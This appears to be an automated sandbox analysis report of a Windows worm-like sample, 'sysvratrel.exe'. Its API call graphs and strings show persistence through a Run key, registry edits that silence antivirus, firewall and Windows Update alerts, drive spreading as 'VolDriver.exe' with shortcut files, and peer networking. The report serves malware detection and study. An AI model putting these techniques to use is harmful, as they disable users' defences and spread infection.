5878->5880 5881 401462 5878->5881 5879->5878 5882 401444 CreateThread 5880->5882 5883 401434 5880->5883 5881->5866 5882->5881 5896 401100 5882->5896 5884 401330 8 API calls 5883->5884 5885 40143a 5884->5885 5885->5866 5887 401339 5886->5887 5894 40139b 5886->5894 5888 401341 SetEvent WaitForSingleObject CloseHandle 5887->5888 5887->5894 5890 401369 5888->5890 5895 40138b 5888->5895 5892 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5890->5892 5890->5895 5891 401395 5893 40a3f0 __aligned_recalloc_base 3 API calls 5891->5893 5892->5890 5893->5894 5894->5873 5925 40ad80 shutdown closesocket 5895->5925 5897 401115 ioctlsocket 5896->5897 5898 4011e4 5897->5898 5900 40113a 5897->5900 5899 40a3f0 __aligned_recalloc_base 3 API calls 5898->5899 5902 4011ea 5899->5902 5901 4011cd WaitForSingleObject 5900->5901 5903 40a220 9 API calls 5900->5903 5904 401168 recvfrom 5900->5904 5905 4011ad InterlockedExchangeAdd 5900->5905 5901->5897 5901->5898 5903->5900 5904->5900 5904->5901 5907 401000 5905->5907 5909 401014 5907->5909 5908 40103b 5918 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5908->5918 5909->5908 5910 409fd0 7 API calls 5909->5910 5910->5908 5912 40105b 5919 401580 5912->5919 5914 4010ec 5914->5900 5915 4010a3 IsBadReadPtr 5917 401071 5915->5917 5916 4010d8 memmove 5916->5917 5917->5914 5917->5915 5917->5916 5918->5912 5920 401592 5919->5920 5921 4015a5 memcpy 5919->5921 5922 40a220 9 API calls 5920->5922 5923 4015c1 5921->5923 5924 40159f 5922->5924 5923->5917 5924->5921 5925->5891 5926 40d190 5927 40d1a6 5926->5927 5941 40d1fe 5926->5941 5928 40d1b0 5927->5928 5929 40d203 5927->5929 5930 40d253 5927->5930 5927->5941 5933 409fd0 7 API calls 5928->5933 5931 40d228 5929->5931 5932 40d21b InterlockedDecrement 5929->5932 5953 40be00 5930->5953 5935 40a3f0 __aligned_recalloc_base 3 API calls 5931->5935 5932->5931 5936 40d1bd 5933->5936 5937 40d234 5935->5937 5949 4023d0 5936->5949 5939 40a3f0 __aligned_recalloc_base 3 API calls 5937->5939 5939->5941 5942 40af80 4 API calls 5943 40d1df 5942->5943 5943->5941 5944 40d1eb InterlockedIncrement 5943->5944 5944->5941 5945 40d2b1 IsBadReadPtr 5947 40d279 5945->5947 5947->5941 5947->5945 5948 40b7b0 192 API calls 5947->5948 5958 40bf00 5947->5958 5948->5947 5950 402413 5949->5950 5951 4023d9 5949->5951 5950->5942 5951->5950 5952 4023ea InterlockedIncrement 5951->5952 5952->5950 5954 40be13 5953->5954 5955 40be3d memcpy 5953->5955 5956 40a220 9 API calls 5954->5956 5955->5947 5957 40be34 5956->5957 5957->5955 5959 40bf29 5958->5959 5960 40bf1e 5958->5960 5959->5960 5961 40bf41 memmove 5959->5961 5960->5947 5961->5960 5648 40f0dc 5649 40f0e4 5648->5649 5650 40f198 5649->5650 5654 40f319 5649->5654 5653 40f11d 5653->5650 5658 40f204 RtlUnwind 5653->5658 5655 40f32e 5654->5655 5657 40f34a 5654->5657 5656 40f3b9 NtQueryVirtualMemory 5655->5656 5655->5657 5656->5657 5657->5653 5659 40f21c 5658->5659 5659->5653 5962 405f1d 5964 405eb1 5962->5964 5963 40a3f0 __aligned_recalloc_base 3 API calls 5965 405f28 LeaveCriticalSection 5963->5965 5966 405f06 memcpy 5964->5966 5967 405f1b 5964->5967 5966->5967 5967->5963 5660 40b660 5661 40b663 WaitForSingleObject 5660->5661 5662 40b691 5661->5662 5663 40b67b InterlockedDecrement 5661->5663 5664 40b68a 5663->5664 5664->5661 5665 40ada0 16 API calls 5664->5665 5665->5664 5666 40d760 5669 401200 5666->5669 5668 40d782 5670 401314 5669->5670 5671 40121d 5669->5671 5670->5668 5671->5670 5672 40a1e0 __aligned_recalloc_base 7 API calls 5671->5672 5673 401247 memcpy htons 5672->5673 5674 4012ed 5673->5674 5675 401297 sendto 5673->5675 5678 40a3f0 __aligned_recalloc_base 3 API calls 5674->5678 5676 4012b6 InterlockedExchangeAdd 5675->5676 5677 4012e9 5675->5677 5676->5675 5679 4012cc 5676->5679 5677->5674 5680 40130a 5677->5680 5681 4012fc 5678->5681 5682 40a3f0 __aligned_recalloc_base 3 API calls 5679->5682 5683 40a3f0 __aligned_recalloc_base 3 API calls 5680->5683 5681->5668 5684 4012db 5682->5684 5683->5670 5684->5668 5969 401920 GetTickCount WaitForSingleObject 5970 401ac9 5969->5970 5971 40194d WSAWaitForMultipleEvents 5969->5971 5972 4019f0 GetTickCount 5971->5972 5973 40196a WSAEnumNetworkEvents 5971->5973 5974 401a43 GetTickCount 5972->5974 5975 401a05 EnterCriticalSection 5972->5975 5973->5972 5988 401983 5973->5988 5976 401ab5 WaitForSingleObject 5974->5976 5977 401a4e EnterCriticalSection 5974->5977 5978 401a16 5975->5978 5979 401a3a LeaveCriticalSection 5975->5979 5976->5970 5976->5971 5980 401aa1 LeaveCriticalSection GetTickCount 5977->5980 5981 401a5f InterlockedExchangeAdd 5977->5981 5984 401a29 LeaveCriticalSection 5978->5984 6011 401820 5978->6011 5979->5976 5980->5976 6029 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5981->6029 5982 401992 accept 5982->5972 5982->5988 5984->5976 5987 401a72 5987->5980 5987->5981 6030 40ad80 shutdown closesocket 5987->6030 5988->5972 5988->5982 5990 401cf0 7 API calls 5988->5990 5991 4022c0 5988->5991 5990->5972 5992 4022d2 EnterCriticalSection 5991->5992 5993 4022cd 5991->5993 5994 4022e7 5992->5994 5995 4022fd LeaveCriticalSection 5992->5995 5993->5988 5994->5995 5996 402308 5995->5996 5997 40230f 5995->5997 5996->5988 5998 409fd0 7 API calls 5997->5998 5999 402319 5998->5999 6000 402326 getpeername CreateIoCompletionPort 5999->6000 6001 4023b8 5999->6001 6002 4023b2 6000->6002 6003 402366 6000->6003 6033 40ad80 shutdown closesocket 6001->6033 6006 40a3f0 __aligned_recalloc_base 3 API calls 6002->6006 6031 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 6003->6031 6006->6001 6007 4023c3 6007->5988 6008 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6032 4021e0 EnterCriticalSection LeaveCriticalSection 6008->6032 6010 4023ab 6010->5988 6012 40190f 6011->6012 6013 401830 6011->6013 6012->5979 6013->6012 6014 40183d InterlockedExchangeAdd 6013->6014 6014->6012 6020 401854 6014->6020 6015 401880 6016 401891 6015->6016 6043 40ad80 shutdown closesocket 6015->6043 6019 4018a7 InterlockedDecrement 6016->6019 6021 401901 6016->6021 6019->6021 6020->6012 6020->6015 6034 4017a0 EnterCriticalSection 6020->6034 6022 402247 6021->6022 6023 402265 EnterCriticalSection 6021->6023 6022->5979 6024 40229c LeaveCriticalSection DeleteCriticalSection 6023->6024 6027 40227d 6023->6027 6025 40a3f0 __aligned_recalloc_base 3 API calls 6024->6025 6025->6022 6026 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6026->6027 6027->6026 6028 40229b 6027->6028 6028->6024 6029->5987 6030->5987 6031->6008 6032->6010 6033->6007 6035 401807 LeaveCriticalSection 6034->6035 6036 4017ba InterlockedExchangeAdd 6034->6036 6035->6020 6037 4017ca LeaveCriticalSection 6036->6037 6038 4017d9 6036->6038 6037->6020 6039 40a3f0 __aligned_recalloc_base 3 API calls 6038->6039 6040 4017fe 6039->6040 6041 40a3f0 __aligned_recalloc_base 3 API calls 6040->6041 6042 401804 6041->6042 6042->6035 6043->6016 5685 40e361 5687 40e36a 5685->5687 5686 40e45d 5687->5686 5688 40e3d3 lstrcmpiW 5687->5688 5689 40e453 SysFreeString 5688->5689 5690 40e3e6 5688->5690 5689->5686 5691 40e150 2 API calls 5690->5691 5693 40e3f4 5691->5693 5692 40e445 5692->5689 5693->5689 5693->5692 5694 40e423 lstrcmpiW 5693->5694 5695 40e435 5694->5695 5696 40e43b SysFreeString 5694->5696 5695->5696 5696->5692 5697 40f0e4 5698 40f102 5697->5698 5700 40f198 5697->5700 5699 40f319 NtQueryVirtualMemory 5698->5699 5702 40f11d 5699->5702 5701 40f204 RtlUnwind 5701->5702 5702->5700 5702->5701 5703 405fe5 5705 405f5e 5703->5705 5704 405fea LeaveCriticalSection 5705->5704 5706 40a460 8 API calls 5705->5706 5707 405fbc 5706->5707 5707->5704 6044 4069a5 6047 40694b 6044->6047 6045 40697b lstrcmpiW 6045->6047 6046 406af6 FindNextFileW 6048 406b12 FindClose 6046->6048 6049 40691f lstrcmpW 6046->6049 6047->6045 6047->6046 6050 4069e2 PathMatchSpecW 6047->6050 6053 406a60 PathFileExistsW 6047->6053 6057 406510 11 API calls 6047->6057 6054 406b1f 6048->6054 6049->6047 6052 406935 lstrcmpW 6049->6052 6050->6047 6051 406a03 wsprintfW SetFileAttributesW DeleteFileW 6050->6051 6051->6047 6052->6047 6053->6047 6055 406a76 wsprintfW wsprintfW 6053->6055 6055->6047 6056 406ae0 MoveFileExW 6055->6056 6056->6046 6057->6047 5708 40ce70 5713 40ced0 5708->5713 5710 40ce9e 5712 40ced0 send 5712->5710 5714 40cee1 send 5713->5714 5715 40ce83 5714->5715 5716 40cefe 5714->5716 5715->5710 5715->5712 5716->5714 5716->5715 5717 40d0f0 5722 40d0f4 5717->5722 5719 40d110 WaitForSingleObject 5721 40d135 5719->5721 5719->5722 5720 40cd10 206 API calls 5720->5722 5722->5719 5722->5720 5722->5721 5723 40b440 EnterCriticalSection 5722->5723 5724 40b477 LeaveCriticalSection 5723->5724 5725 40b45f 5723->5725 5724->5722 5726 40c100 3 API calls 5725->5726 5727 40b46a 5726->5727 5727->5724 6058 40d830 6064 401470 6058->6064 6060 40d844 6061 40d86f 6060->6061 6062 40d855 WaitForSingleObject 6060->6062 6063 401330 8 API calls 6062->6063 6063->6061 6065 401483 6064->6065 6066 401572 6064->6066 6065->6066 6067 409fd0 7 API calls 6065->6067 6066->6060 6068 401498 CreateEventA socket 6067->6068 6069 4014d5 6068->6069 6070 4014cf 6068->6070 6069->6066 6071 4014e2 htons setsockopt bind 6069->6071 6072 401330 8 API calls 6070->6072 6073 401546 6071->6073 6074 401558 CreateThread 6071->6074 6072->6069 6075 401330 8 API calls 6073->6075 6074->6066 6077 401100 20 API calls __aligned_recalloc_base 6074->6077 6076 40154c 6075->6076 6076->6060

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4074d0-407504 Sleep CreateMutexA GetLastError 1 407506-407508 ExitProcess 0->1 2 40750e-4075ad GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075b3-4075be call 40e970 2->3 4 40773a-407765 Sleep RegOpenKeyExW 2->4 14 4075c0-4075c2 ExitProcess 3->14 15 4075c8-407616 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407793-4077b3 RegOpenKeyExW 4->5 6 407767-40778d RegSetValueExA RegCloseKey 4->6 8 4077b5-4077e1 RegSetValueExA RegCloseKey 5->8 9 4077e6-407806 RegOpenKeyExW 5->9 6->5 11 4078e2-407902 RegOpenKeyExW 8->11 12 407808-407837 RegCreateKeyExW RegCloseKey 9->12 13 40783d-40785d RegOpenKeyExW 9->13 16 407930-407950 RegOpenKeyExW 11->16 17 407904-40792a RegSetValueExA RegCloseKey 11->17 12->13 20 407894-4078b4 RegOpenKeyExW 13->20 21 40785f-40788e RegCreateKeyExW RegCloseKey 13->21 18 407687-4076c9 Sleep wsprintfW CopyFileW 15->18 19 407618-407647 SetFileAttributesW RegOpenKeyExW 15->19 23 407952-407978 RegSetValueExA RegCloseKey 16->23 24 40797e-40799e RegOpenKeyExA 16->24 17->16 18->4 25 4076cb-4076fa SetFileAttributesW RegOpenKeyExW 18->25 19->18 22 407649-407681 wcslen RegSetValueExW RegCloseKey 19->22 20->11 26 4078b6-4078dc RegSetValueExA RegCloseKey 20->26 21->20 22->18 23->24 27 4079a4-407a84 RegSetValueExA * 7 RegCloseKey 24->27 28 407a8a-407aaa RegOpenKeyExA 24->28 25->4 29 4076fc-407734 wcslen RegSetValueExW RegCloseKey 25->29 26->11 27->28 30 407ab0-407b90 RegSetValueExA * 7 RegCloseKey 28->30 31 407b96-407bab Sleep call 40ca10 28->31 29->4 30->31 34 407d20-407d29 31->34 35 407bb1-407d1d WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40d880 call 406f50 CreateEventA call 40c140 call 40d370 call 40b500 call 40d3a0 * 4 call 40d510 call 40d650 31->35 35->34
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 004074DE
                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
                                                                          • GetLastError.KERNEL32 ref: 004074F9
                                                                          • ExitProcess.KERNEL32 ref: 00407508
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00417280,00000105), ref: 00407542
                                                                          • PathFindFileNameW.SHLWAPI(00417280), ref: 0040754D
                                                                          • wsprintfW.USER32 ref: 0040756A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040757A
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
                                                                          • wcscmp.NTDLL ref: 004075A3
                                                                          • ExitProcess.KERNEL32 ref: 004075C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                          • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
                                                                          • API String ID: 4172876685-1985754541
                                                                          • Opcode ID: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
                                                                          • Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
                                                                          • Opcode Fuzzy Hash: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
                                                                          • Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 406650-406665 _chkstk 407 406667-406669 406->407 408 40666e-406720 wsprintfW * 5 PathFileExistsW 406->408 409 406b25-406b28 407->409 410 406722-406743 call 40e9b0 408->410 411 406764-406773 PathFileExistsW 408->411 410->411 424 406745-40675e SetFileAttributesW DeleteFileW 410->424 413 4067e0-4067ef PathFileExistsW 411->413 414 406775-406784 PathFileExistsW 411->414 417 4067f1-4067f7 413->417 418 406836-406857 FindFirstFileW 413->418 415 406786-406797 CreateDirectoryW 414->415 416 4067a8-4067b7 PathFileExistsW 414->416 415->416 420 406799-4067a2 SetFileAttributesW 415->420 416->413 421 4067b9-4067cf CopyFileW 416->421 422 406811-406824 call 406400 417->422 423 4067f9-40680f call 406400 417->423 425 40685d-406915 418->425 426 406b1f 418->426 420->416 421->413 428 4067d1-4067da SetFileAttributesW 421->428 437 406827-406830 SetFileAttributesW 422->437 423->437 424->411 427 40691f-406933 lstrcmpW 425->427 426->409 431 406935-406949 lstrcmpW 427->431 432 40694b 427->432 428->413 431->432 435 406950-406961 431->435 436 406af6-406b0c FindNextFileW 432->436 438 406972-406979 435->438 436->427 439 406b12-406b19 FindClose 436->439 437->418 440 4069a7-4069b0 438->440 441 40697b-406998 lstrcmpiW 438->441 439->426 444 4069b2 440->444 445 4069b7-4069c8 440->445 442 40699a 441->442 443 40699c-4069a3 441->443 442->438 443->440 444->436 447 4069d9-4069e0 445->447 448 4069ca-4069d3 445->448 449 406a50-406a59 447->449 450 4069e2-4069ff PathMatchSpecW 447->450 448->447 453 406a60-406a6f PathFileExistsW 449->453 454 406a5b 449->454 451 406a01 450->451 452 406a03-406a49 wsprintfW SetFileAttributesW DeleteFileW 450->452 451->448 452->449 455 406a71 453->455 456 406a76-406ac6 wsprintfW * 2 453->456 454->436 455->436 457 406ae0-406af0 MoveFileExW 456->457 458 406ac8-406ade call 406510 456->458 457->436 458->436
                                                                          APIs
                                                                          • _chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
                                                                          • wsprintfW.USER32 ref: 0040668F
                                                                          • wsprintfW.USER32 ref: 004066AF
                                                                          • wsprintfW.USER32 ref: 004066CF
                                                                          • wsprintfW.USER32 ref: 004066EF
                                                                          • wsprintfW.USER32 ref: 00406708
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040677C
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004067AF
                                                                          • CopyFileW.KERNEL32(00416C68,?,00000000), ref: 004067C7
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                          • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                          • API String ID: 3833403615-1812021906
                                                                          • Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
                                                                          • Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 667 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 668 406565-406579 lstrcmpW 667->668 669 40663f-406642 667->669 670 406591 668->670 671 40657b-40658f lstrcmpW 668->671 673 40660c-406622 FindNextFileW 670->673 671->670 672 406593-4065dc wsprintfW * 2 671->672 675 4065f6-406606 MoveFileExW 672->675 676 4065de-4065f4 call 406510 672->676 673->668 674 406628-406639 FindClose RemoveDirectoryW 673->674 674->669 675->673 676->673
                                                                          APIs
                                                                          • CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
                                                                          • wsprintfW.USER32 ref: 00406535
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                          • lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
                                                                          • lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
                                                                          • wsprintfW.USER32 ref: 004065AA
                                                                          • wsprintfW.USER32 ref: 004065CA
                                                                          • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                          • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                          • API String ID: 92872011-445461498
                                                                          • Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
                                                                          • Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                          • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                            • Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E
                                                                          • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                          • setsockopt.WS2_32 ref: 004020D1
                                                                          • htons.WS2_32(?), ref: 00402101
                                                                          • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                          • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                          • WSACreateEvent.WS2_32 ref: 0040213A
                                                                          • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                            • Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D3A0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                            • Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                            • Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                          • String ID:
                                                                          • API String ID: 1603358586-0
                                                                          • Opcode ID: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
                                                                          • Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
                                                                          • Opcode Fuzzy Hash: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
                                                                          • Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
                                                                          • htons.WS2_32(0000076C), ref: 0040D9A0
                                                                          • inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
                                                                          • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
                                                                            • Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                            • Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                            • Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          • bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
                                                                          • lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
                                                                          • sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
                                                                          • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45
                                                                            • Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                            • Part of subcall function 0040DAD0: Sleep.KERNEL32(000003E8), ref: 0040DB2E
                                                                            • Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                            • Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                            • Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                          • String ID: 239.255.255.250
                                                                          • API String ID: 726339449-2186272203
                                                                          • Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
                                                                          • Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                          • htons.WS2_32(?), ref: 00401508
                                                                          • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
